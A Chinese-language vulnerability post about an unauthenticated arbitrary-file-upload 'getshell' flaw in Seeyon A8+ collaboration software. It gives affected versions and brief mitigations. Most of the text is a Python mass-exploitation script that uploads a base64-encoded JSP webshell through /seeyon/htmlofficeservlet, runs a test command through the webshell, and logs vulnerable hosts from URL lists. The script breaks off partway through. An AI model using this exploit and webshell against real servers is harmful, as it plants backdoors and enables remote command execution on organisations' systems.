致远互联旗下致远 A8+协同管理软件，存在远程 Getshell 漏洞。作为中国协同管理软件及云服务领先厂商，致远 A8+协同管理软件在国内拥有央企、大型公司都有广大的应用。 验证版本： A8+V7.0 SP3、A8+ V6.1 SP2 （V6.1 SP1 验证尚不存在，其他版本未验证） 触发条件：没有限制。 上述版本存在Getshell 漏洞。系统某处在无

致远互联旗下致远 A8+协同管理软件，存在远程 GETSHELL 漏洞。作为中国协同管理软件及云服务领先厂商，致远 A8+协同管理软件在国内拥有央企、大型公司都有广大的应用。

验证版本：

A8+V7.0 SP3、A8+ V6.1 SP2

（V6.1 SP1 验证尚不存在，其他版本未验证）

触发条件：没有限制。

上述版本存在GetShell 漏洞。系统某处在无需登录情况下可直接上传任意文件，攻击者一旦上传精心构造的后门文件即可 Getshell，获得目标服务器的权限。目前利用代码已在野外公开，官方提供的补丁程序仍然可利

用。

缓解措施：

1.通过 ACL 禁止外网对“/seeyon/htmlofficeservlet”路径的访问。

2、官方补丁

请尽快联系致远官方，索要官方补丁程序。

致远 OA A8 无需认证 Getshell 漏洞 Getshell 无需认证 A8 致远OA 安全工具 第1张

POC

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import glob
import time
import base64
import requests
from urllib.parse import urlparse
from multiprocessing import Pool
def start(url):
    if url[:4] != "http":
        print(url.replace("\n", ""), " not is a url.")
        return
    url = list(urlparse(url))[0] + "://" + list(urlparse(url))[1]
    print("[Testing] ", url)
    ua = {"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
    payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
    req = requests.post(url + '/seeyon/htmlofficeservlet', headers=ua, data=base64.b64decode(payload))
    req = requests.get(url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+Miko')
    if "Miko" in req.text:
        print("[Vulnerability]", url)
        download("vuln.txt", url.replace("\n", ""))
    else:
        return url
def read_file(path):
    if not os.path.exists("urls.txt"):
        print("Please check file.", path)
        return
    file = open(path, "r")
    lines = file.readlines()
    file.close()
    return lines
def download(filename, data):
    filename = filename.replace("/", "_")
    if not os.path.exists(filename):
        f = open(filename, "w")
        f.close()
    with open(filename, "a") as f:
        f.write(str(data) + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+Miko\n")
def main():
    pool = Pool()
    paths = [*sys.argv,][1:]
    if not paths:
        paths = [input('[+] Please input path：')]
    for path in paths:
        path = glob.glob(path)